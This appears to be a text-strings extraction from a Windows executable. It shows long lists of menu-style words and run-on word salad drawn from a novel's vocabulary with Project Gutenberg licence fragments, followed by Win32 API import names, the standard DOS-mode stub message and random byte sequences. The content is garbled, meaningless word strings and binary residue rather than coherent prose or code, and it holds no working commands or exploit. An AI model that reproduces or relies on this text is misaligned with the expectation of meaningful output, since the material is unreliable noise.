&face--in moving
&failed straight
&father delightful
&favour
&felicities before
&fellow
figure
&figuring began
flatness
&flowers
fondly celebrated
&forbore
formats bravely
formed
&Foundation effective
frankly library
functionaries
&further
future
&Gabriel humbugging
Gabriel question
general action
&general appearance
genius--he
&gentility suspicion
getting fondly struck esteemed'memories forward course invitation--and(protection abreast humiliations derision$lingering looked precisely observing2Fran?ais come--to proofs because morning pretended0domestic rudiment before during Martins reportedEthree-quarters learned indebted electricities otherwise theres excess
&gowns flaxen
graces though
&grind
&hand-bills
handsome disagree seemed
&Harsh Nicholas
&havent interesting
havent thing
hearing
heroic
&herself
herself seemed mornings never--never
&himself excuse
history
&honour Madame
house
&house
&houses
how--but definitely
however
&however tasteful
hundred
hushed paradoxical
&imagination
immediately mother
impugn are--and
&impugned impression
&inferior
&infinitely
&innocent absolutely
&inscrutably dreadful
&insistently again
&interesting
&interesting bargain
intrude
irrepressible should yours--and
&irresistible reflexion
Juliet
&junior retract
&justice--something
&justly smiling
&kindly volume
knew--I however
ladder
&ladies
&large really
&lawn-tennis returned
&leaning ardent
&length regarded
&letters Havent
LIABILITY
&liberty middle
&life--shes inanity
likely Biddys
&Little
&little short
living Beauclere
London
&London brought
&looked;
looking
&lumped
madam
mainly repeat
&making
masquerade
matter
&matter beside
&matters
means
&meant
&measurements having
&member--am analysis
&mince-meat rooms
&minds holding
Miriam
Miriams
&misfortune
&modest
&modulation
moment
moment tawdry
morning agitated
&morning picture
morning truth
&mother
&mother rather
mothers Gabriel
MS Shell Dlg
&mystery
&neither
nothing
&nothing
nudity smiled
&nutshell
object--a hoping
obstructed
obtaining
&occasion tongue
&occupied
&occurred
opposition believe
&overlooked predecessor
&Paris
particular
&particular
parts friend
patience echoed activity
&people actuality
&perfectly certain--that
performer
&perhaps greater
&personage
&persons behalf
&persuade understood
&Peter
Peters beyond gold-headed6compared delightful Hawthorne little emphasised wooden;finding engaged covertly vaguely dependent trains characterLinstinct mistake--it finished bewildered--there souffle English objurgations
phrased ignorance
please resistance
pleasure
&poets--he
point--he actress
points places wonderfully should
&prepared sacrifice
pressed however
&pressed superior
&pretend
privately suspicion
probably
produced continued
&professional laughing
&Project
&Project women
&pronounced
&proprietress favours
purest stick
pushed
&quantum
&rather
reached
&really Certainly
&recognise side--you
reflexion notice
&regarded preparations
rehearsals challenge gathered
relieve
remain displaying thicknesses
&remarkably recognise
&remember
&remembered
&remonstrance
&repeat determination
replied
&reproducing
resistance rather
&responsible
&resting before
resumed
&returned
returned showed
return snubbed expression
RichEdit20A
&rising
&routed styles
sadly;
&saloon
&salutation affair
satirists apartments
&scene jolly
screw
searched
&seated violently
second
sensibility torment
series discuss
serious
shameful American through critic
Sherringham
&should
&should stayed
&sickly relieved
&silent daresay
sister things burning loosened
situation
slight
smashed settle
&so--he slightly
&something
sometimes almost
&splashes picture
stage
&statesman easily
station remember
&stirred
&story encourage
&Street occurred
streets
&strong Biddys
&struck
&subject
&subtle
success
suffering simply
&suggest have--you
&superseded repeated
support
&support
&surprise
surprise3perverse struck dance liking things offered thought8mother theatres associated represent--societies remember
susceptibility public
SysListView32
&table
Tahoma
&taking
talking
&talking
taste
&tasted
&temper acquaintance
&tenderness
terrible myself
&theatrical admired
&them--they
there quick
theres
&Theyll
&Theyre comparatively
&things
&things ladies
&things result
thinking
think turned minute
though
?though scraping portrait profession discretion Section opposite#Julias extent abatements individual!beside impulse ridiculous recites:visitors standing inmates Gutenberg-tm Because deliciously%submissions irritation friend bon--ah1happened struggle added things--which little--you
&thought
&throb connexion
&through havent
&thrust
tormented watery
&touches
&tragedian again;
tragic
&travel pointed
&treatise earned
trees relaxed
tremendous
turned
&turned offer--to
&uglier mother
unannounced display
unexpected fellow
&uniform futile
vaguely turning
Vavasour thing
vehemence irritation moment needed
&veiled
&vicissitudes courage
virtue
vision determined
vividly mystifying
Voyons--do
&wandered
wanted added
wanted whatever
well--youve struck
which<him--told colour English Juliet--take behind exclusion crawl0night Sherringham--when settle fiercely choosing4expression quitted paragraph nothing dealings should:invent little charity--give younger alone clever--I looked,little extent--I pertinacity removing hardly3confidence recognised though goose something circle
&whirled
whole Archive coloured havent
&window putting
wiser little
without
&without account
&without within
woman culture contradicted tongue
&world daresay
&wouldnt natural
wounded curious
&written
yards Miriam
&you--I grossness
:0+niE= 
0_ujF%
1)annt
4ec!H8
6ahv9_*
6x)aG1
ba2la]
BitBlt
CreateCompatibleDC
CreateWindowExA
()cU_\*
@.data
Dd)C9~
DefWindowProcA
DeleteDC
Dh8z-X
DispatchMessageA
duN1:.f/.P
E174{/
EndPaint
FindResourceA
fq{p9B
gdi32.dll
GetClientRect
GetCurrentProcessId
GetMessageA
GetModuleHandleA
GetProcessHeap
g?RALP
gUkZ+|97
)|hc}V(>r
+HDj|0
HeapAlloc
Ih::^C
iuf)UhI
JenausisFalisious
+JjtyEe
[<[jP,p
kernel32.dll
KillTimer
|kkW`*
kU\TMKFB
l_0E2T
l\>b^t
LoadCursorA
LoadIconA
LoadResource
mNzk~x
("Mp#S
mT2/zY
m:Ua?X
n{=%hH
OG9v)4-
o}~stN
;[,P<;
p|GW"<W
PlDmiU
pmLhEs-
Pny}*$
PostQuitMessage
&p=)Wy
[r|AMr
`.rdata
RegisterClassExA
"`rWJS
SelectObject
SetTimer
ShowWindow
>sP* i
s@S(v*a
!This program cannot be run in DOS mode.
TranslateMessage
*TX~6:&
&-^u{=
u\1tEL
u[*F%>0
:%uF{8<
UpdateWindow
user32.dll
(uZ[>\
VNk8pmnXV
\'Vwb{
>v\"ZdC1
!wiN	"P
=Wl \1
WU0x6G
\XP[W*
	)X\Y{u
!\[">y
_y&b'[
ypxa_ZF